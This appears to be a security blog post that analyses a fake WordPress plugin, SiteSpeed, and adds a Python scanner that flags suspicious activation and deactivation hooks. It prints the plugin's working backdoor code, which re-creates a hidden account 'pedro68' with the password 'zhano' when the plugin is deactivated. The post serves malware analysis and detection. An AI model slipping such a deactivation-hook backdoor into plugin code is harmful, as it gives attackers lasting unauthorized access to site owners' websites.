Fake WordPress plugins appear to be trending as an effective way of establishing a foothold on compromised websites.
During a recent investigation, we discovered a fake component which was masquerading as a legitimate plugin. Named SiteSpeed, it contained a lot of interesting malicious capabilities.
Unwanted Advertisements
The malicious plugin can be used by the attacker to display ads on the website. To avoid detection and target specific website visitors, the plugin has many functions to check the user-agent, referrer, and the IP of the user accessing the page. If a search engine is detected, then the ads will not be displayed — only regular users will see the advertisements from the website pages.
Backdoor Functionality
One interesting technique that this plugin leverages is revealed upon deactivation. If a website administrator decides to deactivate SiteSpeed from the WordPress website, the fake component executes a couple of malicious tasks to maintain unauthorized access.
Let’s take a look at the contents of sitespeed.php to see how it accomplishes the backdoor functionality. We found this malicious file in the plugin’s own directory, /wp-content/plugins/sitespeed/.
    // Runs when the plugin is deactivated (see the hook registration at the bottom)
    function sitespeed_deactivate() {
        global $wpdb;
        $charset_collate = $wpdb->get_charset_collate(); // fetched but never used

        // Remove the plugin's own two tables
        $table_name = $wpdb->prefix . "sitespeed";
        $sql = "DROP TABLE $table_name";
        $wpdb->query( $sql );
        $table_name = $wpdb->prefix . "sitespeedban";
        $sql = "DROP TABLE $table_name";
        $wpdb->query( $sql );

        // Delete any existing "pedro68" account, reassigning its posts to user ID 1
        $user_name = 'pedro68';
        $user_id = username_exists( $user_name );
        if ( $user_id ) {
            wp_delete_user($user_id, 1);
        }

        // Re-create the account with a fixed password and a randomised mailinator.com address
        wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );
        delete_option( 'ads_enable' );
    }

    // Registered as a deactivation hook (note that the guard tests for register_activation_hook)
    if(function_exists('register_activation_hook')) {
        register_deactivation_hook( __FILE__, 'sitespeed_deactivate' );
    }
After dropping the plugin’s two database tables, the code checks for the existence of the username “pedro68” and removes it with wp_delete_user(), reassigning all of that user’s posts to user_id = 1.
This means that any spam content the attacker injected under that account after the compromise stays on the website, now attributed to whichever user holds ID 1. Because WordPress assigns user IDs sequentially, ID 1 is typically the initial administrative account unless it has been changed from the default.
Role Creation
Another interesting functionality is role creation. By leveraging the wp_create_user() function, the attackers create the user “pedro68” with the password “zhano” and an email address built from the username, two random numbers, and the mailinator.com domain:
wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );
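As an added example (not code from the original post), the following Python scanner looks for the pattern described in the two sections above: a plugin whose activation or deactivation callback creates or deletes users or drops tables. The two plugin sources are constructed samples modelled on the sitespeed.php snippet; the indicator list and the function names are assumptions.

```python
import re

# Calls with no business inside an activation/deactivation callback, drawn
# from the SiteSpeed sample: account churn and table drops on deactivation.
RISKY_CALLS = ("wp_create_user", "wp_insert_user", "wp_delete_user",
               "DROP TABLE", "set_role")
# Captures the callback name passed to register_(de)activation_hook.
HOOK_RE = re.compile(
    r"register_(?:de)?activation_hook\s*\(\s*__FILE__\s*,\s*['\"](\w+)['\"]\s*\)")

def function_body(src, name):
    """Body of PHP function `name`, brace-matched so nested blocks are
    included; None if the function is not defined in `src`."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit_plugin(src):
    """Map each hooked callback to the risky calls found in its body."""
    findings = {}
    for callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        hits = [c for c in RISKY_CALLS if body and c in body]
        if hits:
            findings[callback] = hits
    return findings

# Constructed sample modelled on the sitespeed.php deactivation routine.
SUSPICIOUS = r'''<?php
function sitespeed_deactivate() {
    global $wpdb;
    $wpdb->query( "DROP TABLE " . $wpdb->prefix . "sitespeed" );
    $user_id = username_exists( 'pedro68' );
    if ( $user_id ) { wp_delete_user( $user_id, 1 ); }
    wp_create_user( 'pedro68', 'zhano', 'pedro68' . rand(1,10000) . '@mailinator.com' );
}
register_deactivation_hook( __FILE__, 'sitespeed_deactivate' );
'''
# Constructed benign plugin that only removes its own option on deactivation.
BENIGN = r'''<?php
function cache_deactivate() { delete_option( 'cache_enabled' ); }
register_deactivation_hook( __FILE__, 'cache_deactivate' );
'''
```

audit_plugin(SUSPICIOUS) returns {'sitespeed_deactivate': ['wp_create_user', 'wp_delete_user', 'DROP TABLE']} while audit_plugin(BENIGN) returns {}; pointing it at each plugin's main file under wp-content/plugins/ flags callbacks worth reading by hand.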
Conclusion & Mitigation Steps
Hackers want to maintain unauthorized access for as long as possible, and they have a large number of tricks that they use to accomplish this.
Since malware can hide just about anywhere, it’s always worth checking your website’s plugins, existing users, theme files, or any other third-party extensible components for any indicators of compromise. You might just find an extra plugin that you don’t remember installing on your website which is acting as a backdoor.
Compromised websites can be used for a myriad of other malicious activities as well, ranging from DDoS and brute force attacks to spam mailings or malware distribution. Monitoring access to your WordPress website, unauthorized user creation, and changes to active plugins is a great way to mitigate risk and detect a compromise.
To prevent infection, consider using a web application firewall to restrict unauthorized access and mitigate risk to your website.